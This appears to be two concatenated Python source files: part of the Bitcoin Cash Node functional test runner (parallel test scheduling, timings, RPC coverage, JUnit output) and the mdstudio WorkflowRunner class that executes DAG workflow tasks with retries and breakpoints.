# Used to limit the number of tests when a list of tests is not provided on
# the command line. When --extended is specified, we run all tests; otherwise
# we select tests based on execution time.
DEFAULT_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir,
tmpdir, failfast_event, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.failfast_event = failfast_event
self.flags = flags
def run(self, portseed_offset):
if self.failfast_event.is_set():
return TestResult(self.test_num, self.test_case,
"", "Skipped", 0, "", "")
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = self.test_case.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [log.read().decode('utf-8')
for log in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, self.test_case, testdir, status,
int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
# Parse arguments and pass through unrecognised args
parser = argparse.ArgumentParser(add_help=False,
usage='%(prog)s [test_runner.py options] [script options] [scripts]',
description=__doc__,
epilog='''
Help text and arguments for individual test script:''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--combinedlogslen', '-c', type=int, default=0,
help='Print a combined log (of length n lines) from all test nodes and test framework to the console on failure.')
parser.add_argument('--coverage', action='store_true',
help='Generate a basic coverage report for the RPC interface.')
parser.add_argument(
'--exclude', '-x', help='Specify a comma-separated-list of tests to exclude.')
parser.add_argument('--extended', action='store_true',
help='Run all tests in the test suite regardless of runtime. Ignores --cutoff and --startfrom.')
parser.add_argument('--cutoff', type=int, default=DEFAULT_CUTOFF,
help='Skip tests with at least this runtime. Does not affect any new (i.e. untimed) tests.')
parser.add_argument('--startfrom', type=int, default=argparse.SUPPRESS,
help='Only run tests with at least this runtime. Skips any new (i.e. untimed) tests. Ignores --cutoff.')
parser.add_argument('--force', '-f', action='store_true',
help='Run tests even on platforms where they are disabled by default (e.g. Windows).')
parser.add_argument('--help', '-h', '-?',
action='store_true', help='Show this help text and exit.')
parser.add_argument('--jobs', '-j', type=int, default=DEFAULT_JOBS,
help='How many test scripts to run in parallel.')
parser.add_argument('--keepcache', '-k', action='store_true',
help='The default behavior is to flush the cache directory on startup. --keepcache retains the cache from the previous testrun.')
parser.add_argument('--quiet', '-q', action='store_true',
help='Only print results summary and failure logs.')
parser.add_argument('--tmpdirprefix', '-t',
default=os.path.join(build_dir, 'test', 'tmp'), help="Root directory for datadirs")
parser.add_argument(
'--failfast',
action='store_true',
help='stop execution after the first test failure')
parser.add_argument('--junitoutput', '-J', default='junit_results.xml',
help="File that will store JUnit formatted test results. If no absolute path is given it is treated as relative to the temporary directory.")
parser.add_argument('--testsuitename', '-n', default='Bitcoin Cash Node functional tests',
help="Name of the test suite, as it will appear in the logs and in the JUnit report.")
args, unknown_args = parser.parse_known_args()
# args to be passed on always start with two dashes; tests are the
# remaining unknown args
tests = [arg for arg in unknown_args if arg[:2] != "--"]
passon_args = [arg for arg in unknown_args if arg[:2] == "--"]
passon_args.append("--configfile={}".format(configfile))
# Set up logging
logging_level = logging.INFO if args.quiet else logging.DEBUG
logging.basicConfig(format='%(message)s', level=logging_level)
logging.info("Starting {}".format(args.testsuitename))
# Create base test directory
tmpdir = os.path.join("{}", "bitcoin_test_runner_{:%Y%m%d_%H%M%S}").format(
args.tmpdirprefix, datetime.datetime.now())
os.makedirs(tmpdir)
logging.debug("Temporary test directory at {}".format(tmpdir))
if not os.path.isabs(args.junitoutput):
args.junitoutput = os.path.join(tmpdir, args.junitoutput)
enable_bitcoind = config["components"].getboolean("ENABLE_BITCOIND")
if config["environment"]["EXEEXT"] == ".exe" and not args.force:
# https://github.com/bitcoin/bitcoin/commit/d52802551752140cf41f0d9a225a43e84404d3e9
# https://github.com/bitcoin/bitcoin/pull/5677#issuecomment-136646964
print(
"Tests currently disabled on Windows by default. Use --force option to enable")
sys.exit(0)
if not enable_bitcoind:
print("No functional tests to run.")
print("Rerun ./configure with --with-daemon and then make")
sys.exit(0)
# Build list of tests
all_scripts = get_all_scripts_from_disk(tests_dir, NON_SCRIPTS)
# Check all tests with parameters actually exist
for test in TEST_PARAMS:
if test not in all_scripts:
print("ERROR: Test with parameter {} does not exist, check it has "
"not been renamed or deleted".format(test))
sys.exit(1)
if tests:
# Individual tests have been specified. Run specified tests that exist
# in the all_scripts list. Accept the name with or without .py
# extension.
individual_tests = [
re.sub(r"\.py$", "", t) + ".py" for t in tests if not t.endswith('*')]
test_list = []
for t in individual_tests:
if t in all_scripts:
test_list.append(t)
else:
print("{}WARNING!{} Test '{}' not found in full test list.".format(
BOLD[1], BOLD[0], t))
# Allow for wildcard at the end of the name, so a single input can
# match multiple tests
for test in tests:
if test.endswith('*'):
test_list.extend(
[t for t in all_scripts if t.startswith(test[:-1])])
# do not cut off explicitly specified tests
cutoff = sys.maxsize
startfrom = 0
else:
# No individual tests have been specified.
# Run all tests that do not exceed
test_list = all_scripts
if args.extended:
cutoff = sys.maxsize
startfrom = 0
elif 'startfrom' in args:
cutoff = sys.maxsize
startfrom = args.startfrom
else:
cutoff = args.cutoff
startfrom = 0
# Remove the test cases that the user has explicitly asked to exclude.
if args.exclude:
tests_excl = [re.sub(r"\.py$", "", t)
+ ".py" for t in args.exclude.split(',')]
for exclude_test in tests_excl:
if exclude_test in test_list:
test_list.remove(exclude_test)
else:
print("{}WARNING!{} Test '{}' not found in current test list.".format(
BOLD[1], BOLD[0], exclude_test))
# Update timings from build_dir only if separate build directory is used.
# We do not want to pollute source directory.
build_timings = None
if (src_dir != build_dir):
build_timings = Timings(os.path.join(build_dir, 'timing.json'))
# Always use timings from src_dir if present
src_timings = Timings(os.path.join(
src_dir, "test", "functional", 'timing.json'))
# Add test parameters and remove long running tests if needed
test_list = get_tests_to_run(
test_list, TEST_PARAMS, cutoff, startfrom, src_timings)
if not test_list:
print("No valid test scripts specified. Check that your test is in one "
"of the test lists in test_runner.py, or run test_runner.py with no arguments to run all tests")
sys.exit(0)
if args.help:
# Print help for test_runner.py, then print help of the first script
# and exit.
parser.print_help()
subprocess.check_call(
[sys.executable, os.path.join(tests_dir, test_list[0]), '-h'])
sys.exit(0)
check_script_prefixes(all_scripts)
if not args.keepcache:
shutil.rmtree(os.path.join(build_dir, "test",
"cache"), ignore_errors=True)
run_tests(
test_list,
build_dir,
tests_dir,
args.junitoutput,
tmpdir,
num_jobs=args.jobs,
test_suite_name=args.testsuitename,
enable_coverage=args.coverage,
args=passon_args,
combined_logs_len=args.combinedlogslen,
build_timings=build_timings,
failfast=args.failfast
)
def run_tests(test_list, build_dir, tests_dir, junitoutput, tmpdir, num_jobs, test_suite_name,
enable_coverage=False, args=None, combined_logs_len=0, build_timings=None, failfast=False):
args = args or []
# Warn if bitcoind is already running (unix only)
try:
pidofOutput = subprocess.check_output(["pidof", "bitcoind"])
if pidofOutput is not None and pidofOutput != b'':
print("{}WARNING!{} There is already a bitcoind process running on this system. Tests may fail unexpectedly due to resource contention!".format(
BOLD[1], BOLD[0]))
except (OSError, subprocess.SubprocessError):
pass
# Warn if there is a cache directory
cache_dir = os.path.join(build_dir, "test", "cache")
if os.path.isdir(cache_dir):
print("{}WARNING!{} There is a cache directory here: {}. If tests fail unexpectedly, try deleting the cache directory.".format(
BOLD[1], BOLD[0], cache_dir))
flags = ['--cachedir={}'.format(cache_dir)] + args
if enable_coverage:
coverage = RPCCoverage()
flags.append(coverage.flag)
logging.debug(
"Initializing coverage directory at {}".format(coverage.dir))
else:
coverage = None
if len(test_list) > 1 and num_jobs > 1:
# Populate cache
try:
subprocess.check_output([sys.executable, os.path.join(
tests_dir, 'create_cache.py')] + flags + [os.path.join("--tmpdir={}", "cache") .format(tmpdir)])
except subprocess.CalledProcessError as e:
sys.stdout.buffer.write(e.output)
raise
# Run Tests
time0 = time.time()
test_results = execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast)
runtime = int(time.time() - time0)
max_len_name = len(max(test_list, key=len))
print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len)
save_results_as_junit(test_results, junitoutput, runtime, test_suite_name)
if (build_timings is not None):
build_timings.save_timings(test_results)
if coverage:
coverage_passed = coverage.report_rpc_coverage()
logging.debug("Cleaning up coverage data")
coverage.cleanup()
else:
coverage_passed = True
# Clear up the temp directory if all subdirectories are gone
if not os.listdir(tmpdir):
os.rmdir(tmpdir)
all_passed = all(map(
lambda test_result: test_result.was_successful, test_results)) and coverage_passed
sys.exit(not all_passed)
def execute_test_processes(
num_jobs, test_list, tests_dir, tmpdir, flags, failfast=False):
update_queue = Queue()
job_queue = Queue()
failfast_event = threading.Event()
test_results = []
poll_timeout = 10 # seconds
# In case there is a graveyard of zombie bitcoinds, we can apply a
# pseudorandom offset to hopefully jump over them.
# (625 is PORT_RANGE/MAX_NODES)
portseed_offset = int(time.time() * 1000) % 625
##
# Define some helper functions we will need for threading.
##
def handle_message(message, running_jobs):
"""
handle_message handles a single message from handle_test_cases
"""
if isinstance(message, TestCase):
running_jobs.append((message.test_num, message.test_case))
print("{}{}{} started".format(BOLD[1], message.test_case, BOLD[0]))
return
if isinstance(message, TestResult):
test_result = message
running_jobs.remove((test_result.num, test_result.name))
test_results.append(test_result)
if test_result.status == "Passed":
print("{}{}{} passed, Duration: {} s".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
elif test_result.status == "Skipped":
print("{}{}{} skipped".format(
BOLD[1], test_result.name, BOLD[0]))
else:
print("{}{}{} failed, Duration: {} s\n".format(
BOLD[1], test_result.name, BOLD[0], test_result.time))
print(BOLD[1] + 'stdout:' + BOLD[0])
print(test_result.stdout)
print(BOLD[1] + 'stderr:' + BOLD[0])
print(test_result.stderr)
if failfast:
logging.debug("Early exiting after test failure")
failfast_event.set()
return
assert False, "we should not be here"
def handle_update_messages():
"""
handle_update_messages waits for messages to be sent from handle_test_cases via the
update_queue. It serializes the results so we can print nice status update messages.
"""
printed_status = False
running_jobs = []
while True:
message = None
try:
message = update_queue.get(True, poll_timeout)
if message is None:
break
# We printed a status message, need to kick to the next line
# before printing more.
if printed_status:
print()
printed_status = False
handle_message(message, running_jobs)
update_queue.task_done()
except Empty:
if not on_ci():
print("Running jobs: {}".format(
", ".join([j[1] for j in running_jobs])), end="\r")
sys.stdout.flush()
printed_status = True
def handle_test_cases():
"""
handle_test_cases represents a single thread that is part of a worker pool.
It waits for a test, then executes that test.
It also reports start and result messages to handle_update_messages.
"""
while True:
test = job_queue.get()
if test is None:
break
# Signal that the test is starting to inform the poor waiting
# programmer
update_queue.put(test)
result = test.run(portseed_offset)
update_queue.put(result)
job_queue.task_done()
##
# Setup our threads, and start sending tasks
##
# Start our result collection thread.
resultCollector = threading.Thread(target=handle_update_messages)
resultCollector.daemon = True
resultCollector.start()
# Start some worker threads
for j in range(num_jobs):
t = threading.Thread(target=handle_test_cases)
t.daemon = True
t.start()
# Push all our test cases into the job queue.
for i, t in enumerate(test_list):
job_queue.put(TestCase(i, t, tests_dir, tmpdir, failfast_event, flags))
# Wait for all the jobs to be completed
job_queue.join()
# Wait for all the results to be compiled
update_queue.join()
# Flush our queues so the threads exit
update_queue.put(None)
for j in range(num_jobs):
job_queue.put(None)
return test_results
def print_results(test_results, tests_dir, max_len_name,
runtime, combined_logs_len):
results = "\n" + BOLD[1] + "{} | {} | {} | {}\n\n".format(
"TEST".ljust(max_len_name), "STATUS ", "DURATION", "ORIG. ORDER") + BOLD[0]
test_results.sort(key=TestResult.sort_key)
all_passed = True
time_sum = 0
for test_result in test_results:
all_passed = all_passed and test_result.was_successful
time_sum += test_result.time
test_result.padding = max_len_name
results += str(test_result)
testdir = test_result.testdir
if combined_logs_len and os.path.isdir(testdir):
# Print the final `combinedlogslen` lines of the combined logs
print('{}Combine the logs and print the last {} lines ...{}'.format(
BOLD[1], combined_logs_len, BOLD[0]))
print('\n============')
print('{}Combined log for {}:{}'.format(BOLD[1], testdir, BOLD[0]))
print('============\n')
combined_logs, _ = subprocess.Popen([sys.executable, os.path.join(
tests_dir, 'combine_logs.py'), '-c', testdir], universal_newlines=True, stdout=subprocess.PIPE).communicate()
print(
"\n".join(
deque(
combined_logs.splitlines(),
combined_logs_len)))
status = TICK + "Passed" if all_passed else CROSS + "Failed"
if not all_passed:
results += RED[1]
results += BOLD[1] + "\n{} | {} | {} s (accumulated)\n".format(
"ALL".ljust(max_len_name), status.ljust(9), time_sum) + BOLD[0]
if not all_passed:
results += RED[0]
results += "Runtime: {} s\n".format(runtime)
print(results)
class TestResult():
"""
Simple data structure to store test result values and print them properly
"""
def __init__(self, num, name, testdir, status, time, stdout, stderr):
self.num = num
self.name = name
self.testdir = testdir
self.status = status
self.time = time
self.padding = 0
self.stdout = stdout
self.stderr = stderr
def sort_key(self):
if self.status == "Passed":
return 0, self.name.lower()
elif self.status == "Failed":
return 2, self.name.lower()
elif self.status == "Skipped":
return 1, self.name.lower()
def __repr__(self):
if self.status == "Passed":
color = BLUE
glyph = TICK
elif self.status == "Failed":
color = RED
glyph = CROSS
elif self.status == "Skipped":
color = GREY
glyph = CIRCLE
return color[1] + "{} | {}{} | {} | {}\n".format(
self.name.ljust(self.padding), glyph, self.status.ljust(7), (str(self.time) + " s").ljust(8), self.num + 1) + color[0]
@property
def was_successful(self):
return self.status != "Failed"
def get_all_scripts_from_disk(test_dir, non_scripts):
"""
Return all available test scripts from the script directory (excluding NON_SCRIPTS)
"""
python_files = set([t for t in os.listdir(test_dir) if t[-3:] == ".py"])
return list(python_files - set(non_scripts))
def check_script_prefixes(all_scripts):
"""Check that no more than `EXPECTED_VIOLATION_COUNT` of the
test scripts don't start with one of the allowed name prefixes."""
EXPECTED_VIOLATION_COUNT = 27
# LEEWAY is provided as a transition measure, so that pull-requests
# that introduce new tests that don't conform with the naming
# convention don't immediately cause the tests to fail.
LEEWAY = 10
good_prefixes_re = re.compile(
"(example|feature|interface|mempool|mining|p2p|rpc|wallet)_")
bad_script_names = [
script for script in all_scripts if good_prefixes_re.match(script) is None]
if len(bad_script_names) < EXPECTED_VIOLATION_COUNT:
print(
"{}HURRAY!{} Number of functional tests violating naming convention reduced!".format(
BOLD[1],
BOLD[0]))
print("Consider reducing EXPECTED_VIOLATION_COUNT from {} to {}".format(
EXPECTED_VIOLATION_COUNT, len(bad_script_names)))
elif len(bad_script_names) > EXPECTED_VIOLATION_COUNT:
print(
"INFO: {} tests not meeting naming conventions (expected {}):".format(len(bad_script_names), EXPECTED_VIOLATION_COUNT))
print(" {}".format("\n ".join(sorted(bad_script_names))))
assert len(bad_script_names) <= EXPECTED_VIOLATION_COUNT + \
LEEWAY, "Too many tests not following naming convention! ({} found, expected: <= {})".format(
len(bad_script_names), EXPECTED_VIOLATION_COUNT)
def get_tests_to_run(test_list, test_params, cutoff, startfrom, src_timings):
"""
Returns only tests that will not run longer than the cutoff.
Returns only tests that will run for at least startfrom seconds.
Long running tests are returned first to favor running tests in parallel.
Timings from the build directory override those from the src directory.
"""
def get_test_time(test):
# Return 0 if test is unknown to always run it
return next(
(x['time'] for x in src_timings.existing_timings if x['name'] == test), 0)
# Some tests must also be run with additional parameters. Add them to the
# list.
tests_with_params = []
for test_name in test_list:
# always execute a test without parameters
tests_with_params.append(test_name)
params = test_params.get(test_name)
if params is not None:
tests_with_params.extend(
[test_name + " " + " ".join(p) for p in params])
result = []
for t in tests_with_params:
runtime = get_test_time(t)
if runtime < cutoff and runtime >= startfrom:
result.append(t)
result.sort(key=lambda x: (-get_test_time(x), x))
return result
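# Worked example (timing values hypothetical): with TEST_PARAMS as defined
# above, "wallet_txn_doublespend.py" expands into two candidates,
#   wallet_txn_doublespend.py
#   wallet_txn_doublespend.py --mineblock
# Each candidate is looked up in src_timings by its full string; unknown
# entries get a time of 0 (so they run unless --startfrom filters them out),
# and the surviving list is sorted longest-running-first so slow tests start
# early in the parallel run.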
class RPCCoverage():
"""
Coverage reporting utilities for test_runner.
Coverage calculation works by having each test script subprocess write
coverage files into a particular directory. These files contain the RPC
commands invoked during testing, as well as a complete listing of RPC
commands per `bitcoin-cli help` (`rpc_interface.txt`).
After all tests complete, the commands run are combined and diff'd against
the complete list to calculate uncovered RPC commands.
See also: test/functional/test_framework/coverage.py
"""
def __init__(self):
self.dir = tempfile.mkdtemp(prefix="coverage")
self.flag = '--coveragedir={}'.format(self.dir)
def report_rpc_coverage(self):
"""
Print out RPC commands that were unexercised by tests.
"""
uncovered = self._get_uncovered_rpc_commands()
if uncovered:
print("Uncovered RPC commands:")
print("".join((" - {}\n".format(i)) for i in sorted(uncovered)))
return False
else:
print("All RPC commands covered.")
return True
def cleanup(self):
return shutil.rmtree(self.dir)
def _get_uncovered_rpc_commands(self):
"""
Return a set of currently untested RPC commands.
"""
# This is shared from `test/functional/test_framework/coverage.py`
reference_filename = 'rpc_interface.txt'
coverage_file_prefix = 'coverage.'
coverage_ref_filename = os.path.join(self.dir, reference_filename)
coverage_filenames = set()
all_cmds = set()
covered_cmds = set()
if not os.path.isfile(coverage_ref_filename):
raise RuntimeError("No coverage reference found")
with open(coverage_ref_filename, 'r', encoding="utf8") as f:
all_cmds.update([i.strip() for i in f.readlines()])
for root, dirs, files in os.walk(self.dir):
for filename in files:
if filename.startswith(coverage_file_prefix):
coverage_filenames.add(os.path.join(root, filename))
for filename in coverage_filenames:
with open(filename, 'r', encoding="utf8") as f:
covered_cmds.update([i.strip() for i in f.readlines()])
return all_cmds - covered_cmds
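# Illustrative layout of the coverage directory consumed above (one RPC
# command per line in each file; names hypothetical):
#
#   <coveragedir>/rpc_interface.txt   # all commands, per `bitcoin-cli help`
#   <coveragedir>/coverage.<suffix>   # commands exercised by one test run
#
# The uncovered set is simply the difference: all_cmds - covered_cmds.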
def save_results_as_junit(test_results, file_name, time, test_suite_name):
"""
Save test results to a file in JUnit format.
See http://llg.cubic.org/docs/junit/ for specification of format
"""
e_test_suite = ET.Element("testsuite",
{"name": "{}".format(test_suite_name),
"tests": str(len(test_results)),
# "errors":
"failures": str(len([t for t in test_results if t.status == "Failed"])),
"id": "0",
"skipped": str(len([t for t in test_results if t.status == "Skipped"])),
"time": str(time),
"timestamp": datetime.datetime.now().isoformat('T')
})
for test_result in test_results:
e_test_case = ET.SubElement(e_test_suite, "testcase",
{"name": test_result.name,
"classname": test_result.name,
"time": str(test_result.time)
}
)
if test_result.status == "Skipped":
ET.SubElement(e_test_case, "skipped", {"message": "skipped"}).text = "skipped"
elif test_result.status == "Failed":
fail_result = test_result.stderr or test_result.stdout or "<no output>"
ET.SubElement(e_test_case, "failure", {"message": "failure"}).text = fail_result
# no special element for passed tests
ET.SubElement(e_test_case, "system-out").text = test_result.stdout
ET.SubElement(e_test_case, "system-err").text = test_result.stderr
ET.ElementTree(e_test_suite).write(
file_name, "UTF-8", xml_declaration=True)
class Timings():
"""
Takes care of loading, merging and saving tests execution times.
"""
def __init__(self, timing_file):
self.timing_file = timing_file
self.existing_timings = self.load_timings()
def load_timings(self):
if os.path.isfile(self.timing_file):
with open(self.timing_file, encoding="utf8") as f:
return json.load(f)
else:
return []
def get_merged_timings(self, new_timings):
"""
Return a new list containing existing timings updated with new timings.
Tests that no longer exist are not removed.
"""
key = 'name'
merged = {}
for item in self.existing_timings + new_timings:
if item[key] in merged:
merged[item[key]].update(item)
else:
merged[item[key]] = item
# Sort the result to preserve test ordering in file
merged = list(merged.values())
merged.sort(key=lambda t, key=key: t[key])
return merged
def save_timings(self, test_results):
# We only save tests that have passed - timings for failed tests might be
# wrong (timeouts or early fails).
passed_results = [t for t in test_results if t.status == 'Passed']
new_timings = list(map(lambda t: {'name': t.name, 'time': t.time},
passed_results))
merged_timings = self.get_merged_timings(new_timings)
with open(self.timing_file, 'w', encoding="utf8") as f:
json.dump(merged_timings, f, indent=True)
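# The timing file loaded and saved above is a flat JSON list of entries with
# 'name' and 'time' keys, e.g. (values illustrative):
#
#   [
#     {"name": "feature_x.py", "time": 12},
#     {"name": "wallet_txn_doublespend.py --mineblock", "time": 33}
#   ]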
if __name__ == '__main__':
main()
|
workflow_runner.py
|
# -*- coding: utf-8 -*-
import os
import threading
import random
from mdstudio_workflow import __twisted_logger__
from mdstudio_workflow.workflow_common import WorkflowError, validate_workflow
from mdstudio_workflow.workflow_spec import WorkflowSpec
if __twisted_logger__:
from twisted.logger import Logger
logging = Logger()
else:
import logging
class WorkflowRunner(WorkflowSpec):
"""
This is the main class for running microservice oriented workflows.
Running a workflow is based on a workflow specification built using the
`WorkflowSpec` class. Such a workflow can be loaded into the `Workflow`
class simply by overloading the Workflow.workflow attribute.
The `Workflow` class also inherits the methods from the `WorkflowSpec`
class, allowing one to build a specification right from the `Workflow`
class and even to change a running workflow.
The execution of workflow steps is performed on a different thread than
the main Workflow object, allowing the user to interact with the running
workflow.
The DAG, including the metadata that is generated while executing the
steps, can be serialized to JSON for persistent storage. The same JSON
object is used as input to the Workflow class and is validated by a
Workflow JSON schema.
:param workflow: the workflow DAG to run
:type workflow: JSON object
"""
def __init__(self, workflow=None, **kwargs):
# Init inherit classes such as the WorkflowSpec
super(WorkflowRunner, self).__init__(workflow=workflow, **kwargs)
# Define task runner
self.task_runner = None
self.workflow_thread = None
# Workflow state
self.project_metadata = None
self._is_running = False
def process_check_run(self, task, output):
"""
Process a Future object and register a new task status check for the future.
:param task: task to check
:type task: :graphit:Graph
:param output: Future object
:type output: :py:dict
"""
if not task.task_metadata.external_task_id():
task.task_metadata.external_task_id.set(task.data.value_tag, output.get('task_id'))
if 'query_url' in output:
task.query_url.set(task.data.value_tag, output['query_url'])
delta_t = output.get('delta_t', 600)
timer = threading.Timer(delta_t, task.check_task, (self.output_callback,), {'task_runner':self.task_runner})
timer.daemon = True
timer.start()
logging.info('Task {0} ({1}): {2} check {3} next after {4} sec.'.format(task.status, task.nid, task.key,
task.task_metadata.checks(), delta_t))
def output_callback(self, output, tid, update=True):
"""
Process the output of a task and stage the next task(s) to run.
A successful task is expected to return some output. If None it
is considered to have failed by the workflow manager.
:param output: output of the task
:type output: :py:dict
:param tid: task ID
:type tid: :py:int
"""
# Get and update the task
task = self.get_task(tid)
status, output = task.update(output)
# Update project metadata
if update:
self.project_metadata.update_time.set()
# Save results as part of workflow to file
if self.project_metadata.project_dir():
self.save(os.path.join(self.project_metadata.project_dir(), 'workflow.jgf'))
# Process Future object
if output.get('object_type') == 'FutureObject' and status == 'running':
self.process_check_run(task, output)
return
# Switch workdir if needed
if self.project_metadata.project_dir.get():
os.chdir(self.project_metadata.project_dir.get())
# If the task is completed, go to next
next_task_nids = []
if status == 'completed':
# Get next task(s) to run
next_tasks = task.next_tasks()
next_task_nids.extend([ntask.nid for ntask in next_tasks])
logging.info('{0} new tasks to run with output of {1} ({2}): {3}'.format(len(next_task_nids), task.nid,
task.key, ','.join([nt.key for nt in next_tasks])))
# If the task failed, retry if allowed and reset status to "ready"
if status == 'failed' and task.task_metadata.retry_count():
task.task_metadata.retry_count.value -= 1
task.status = 'ready'
logging.warn('Task {0} ({1}) failed. Retry ({2} times left)'.format(task.nid, task.key,
task.task_metadata.retry_count()))
next_task_nids.append(task.nid)
# If the task failed and no retries are left, save the workflow and stop.
if task.status == 'failed' and task.task_metadata.retry_count() == 0:
logging.error('Task {0} ({1}) failed'.format(task.nid, task.key))
self.is_running = False
return
# If the task is completed but a breakpoint is defined, wait for the
# breakpoint to be lifted
if task.task_metadata.breakpoint():
logging.info('Task {0} ({1}) finished but breakpoint is active'.format(task.nid, task.key))
self.is_running = False
return
# No more new tasks
if not next_task_nids:
# Not finished but no active tasks anymore/breakpoint
if not self.active_tasks and not self.is_completed:
breakpoints = self.active_breakpoints
if breakpoints:
logging.info('Active breakpoint: {0}'.format(', '.join([t.key for t in breakpoints])))
self.is_running = False
return
# Finish off if there are no more tasks to run and all are completed
if self.is_completed or self.has_failed:
logging.info('finished workflow')
if not self.project_metadata.finish_time():
self.project_metadata.finish_time.set()
self.is_running = False
return
# Launch new tasks
for tid in next_task_nids:
self.run_task(tid)
def run_task(self, tid):
"""
Run a task by task ID (tid)
Handles the setup procedure for running a task using a dedicated Task
runner. The output or errors of a task are handled by the
`output_callback` method.
Tasks to run are processed using the following rules:
* If the task is currently active, stop and have the output callback
function deal with it.
* If the task has status 'ready' run it.
* In all other cases, pass the task data to the output callback
function. This is useful for hopping over finished tasks when
relaunching a workflow for instance.
:param tid: Task node identifier
:type tid: :py:int
"""
task = self.get_task(tid)
# Do not continue if the task is active
if task.is_active:
logging.debug('Task {0} ({1}) already active'.format(task.nid, task.key))
return
# Only continue if all connected tasks are done
unfinished_prev_tasks = [t for t in task.previous_tasks() if t.status != 'completed']
if unfinished_prev_tasks:
logging.info('Task {0} ({1}): output of tasks {2} not available'.format(task.nid, task.key,
', '.join([str(t.nid) for t in unfinished_prev_tasks])))
# In case of previously failed tasks, try to unset is_running
for unfinished in unfinished_prev_tasks:
if unfinished.status == 'failed':
self.is_running = False
break
return
# Run the task if status is 'ready'
if task.status == 'ready':
logging.info('Task {0} ({1}), status: preparing'.format(task.nid, task.key))
# Confirm again that the workflow is running
self.is_running = True
self.project_metadata.update_time.set()
# Perform run preparations and run the task
if task.prepare_run():
task.status = 'running'
if task.task_type == 'WampTask':
wait = random.randint(5,10)
logging.info('Task {0} ({1}): start task in {2} sec.'.format(task.nid, task.key, wait))
threading.Timer(wait, task.run_task, (self.output_callback,),
{'task_runner': self.task_runner}).start()
else:
task.run_task(self.output_callback, task_runner=self.task_runner)
else:
logging.error('Task preparation failed')
self.output_callback(None, task.nid)
# In all other cases, pass None and have the task output update
# method decide what to do next.
else:
logging.info('Task {0} ({1}), status: {2}'.format(task.nid, task.key, task.status))
self.output_callback(None, tid, update=False)
@property
def is_running(self):
"""
Returns the global state of the workflow as running or not.
:rtype: :py:bool
"""
return self._is_running
@is_running.setter
def is_running(self, state):
"""
Set the global state of the workflow as running or not.
If the new state is 'False' first check if there are no other parallel
active tasks.
:rtype: :py:bool
"""
if not state:
state = len(self.active_tasks) >= 1
self._is_running = state
@property
def is_completed(self):
"""
Is the workflow completed successfully or not
:rtype: :py:bool
"""
return all([task.status in ('completed', 'disabled') for task in self.get_tasks()])
@property
def has_failed(self):
"""
Did the workflow finish unsuccessfully?
True if there are no more active tasks and at least one task has failed
or was aborted
:rtype: :py:bool
"""
if not len(self.active_tasks) and any([task.status in ('failed', 'aborted') for task in self.get_tasks()]):
return True
return False
@property
def starttime(self):
"""
Return the time stamp at which the workflow was last started
:rtype: :py:int
"""
return self.project_metadata.start_time.timestamp()
@property
def updatetime(self):
"""
Return the time stamp at which the workflow was last updated
:rtype: :py:int
"""
return self.project_metadata.update_time.timestamp()
@property
def finishtime(self):
"""
Return the time stamp at which the workflow finished or None
if it has not yet finished
:rtype: :py:int
"""
if not self.is_running:
return self.project_metadata.finish_time.timestamp()
return None
@property
def runtime(self):
"""
Return the total workflow runtime in seconds as the difference between
the start time and the finish time or last update time.
:rtype: :py:int
"""
start = self.starttime or 0
end = self.finishtime or self.updatetime
# No update and finish time means the workflow was not started yet
if not end:
return 0
return end - start
@property
def active_tasks(self):
"""
Return all active tasks in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.is_active]
@property
def failed_tasks(self):
"""
Return failed tasks in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.status == 'failed']
@property
def active_breakpoints(self):
"""
Return tasks with active breakpoint in the workflow
:rtype: :py:list
"""
return [task for task in self.get_tasks() if task.task_metadata.breakpoint.get(default=False)]
def cancel(self):
"""
Cancel the full workflow.
This method will send a cancel request to all active tasks in the
running workflow. Once there are no more active tasks the workflow
run method will stop and the daemon thread will be closed.
For canceling specific tasks please use the `cancel` function of the
specific task retrieved using the `WorkflowSpec.get_task` method or
workflow graph methods.
"""
if not self.is_running:
logging.info('Unable to cancel workflow that is not running.')
return
# Get active task
active_tasks = self.active_tasks
logging.info('Cancel tasks: {0}'.format(', '.join([t.key for t in active_tasks])))
for task in active_tasks:
task.cancel()
self.project_metadata.update_time.set()
self.is_running = False
def get_task(self, tid=None, key=None):
"""
Return a task by task ID (graph nid) or task name (key).
:param tid: nid of task to return
:type tid: :py:int
:param key: task name
:type key: :py:str
:return: task object
:rtype: :graphit:Graph
"""
if tid:
task = self.workflow.getnodes(tid)
elif key:
task = self.workflow.query_nodes(key=key)
else:
raise WorkflowError('Search on task ID (tid) or task name (key). None defined')
if task.empty():
raise WorkflowError('Task with tid {0} not in workflow'.format(tid))
if not task.get('format') == 'task':
raise WorkflowError('Node with tid {0} is no task object'.format(tid))
return task
